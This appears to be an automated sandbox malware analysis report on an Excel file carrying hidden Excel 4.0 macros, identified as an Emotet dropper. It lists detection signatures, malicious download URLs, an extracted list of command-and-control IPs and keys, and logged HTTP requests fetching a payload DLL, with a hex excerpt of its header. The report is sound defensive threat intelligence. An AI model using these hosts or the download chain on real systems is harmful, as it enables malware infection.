Windows Analysis Report
opastonline.com.xls

Overview

General Information

Sample Name: opastonline.com.xls
Analysis ID: 562504
MD5: e42ac962bed3fc210b24f8a87161e9b3
SHA1: 0c5bbeb25cd544993acefbc3041b23f99a56a7d5
SHA256: 601121c30531ce26c85a232f1e76df6a0eec591296ff711d45912db421d67a10
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3 Avira URL Cloud: Label: phishing
Source: http://ancyh.xyz Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3 Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/z Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3 Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/ Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-cont Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/PE3 Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.png Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3 Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/ Avira URL Cloud: Label: phishing
Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/ Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/PE3 Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z Avira URL Cloud: Label: phishing
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/ Avira URL Cloud: Label: malware
Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3 Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3 Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/ Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3 Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3 Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3 Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/ Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3 Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.html Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/ Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 13.2.rundll32.exe.2fb0000.24.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 10_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767E00 FindFirstFileW, 13_2_00767E00

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: weezual.fr
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 548864Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 22:03:57 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 22:03:57 GMTContent-Disposition: attachment; filename="aiK6pubP5D.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f4684d41661=1643407437; expires=Fri, 28-Jan-2022 22:04:57 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 22:03:57 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436666911.00000000002FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html
Source: opastonline.com.xls.0.dr String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.423172440.000000000263D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422785781.0000000002635000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.438156977.000000000026E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
Source: mshta.exe, 00000004.00000002.438930744.0000000002AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlr
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.p
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.677149502.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.png
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.13.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabq
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-cont
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.s
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fo
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwso
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.f
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.421158133.0000000002B34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000002.438881833.00000000027CB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: mshta.exe, 00000004.00000002.439514279.0000000004900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ll
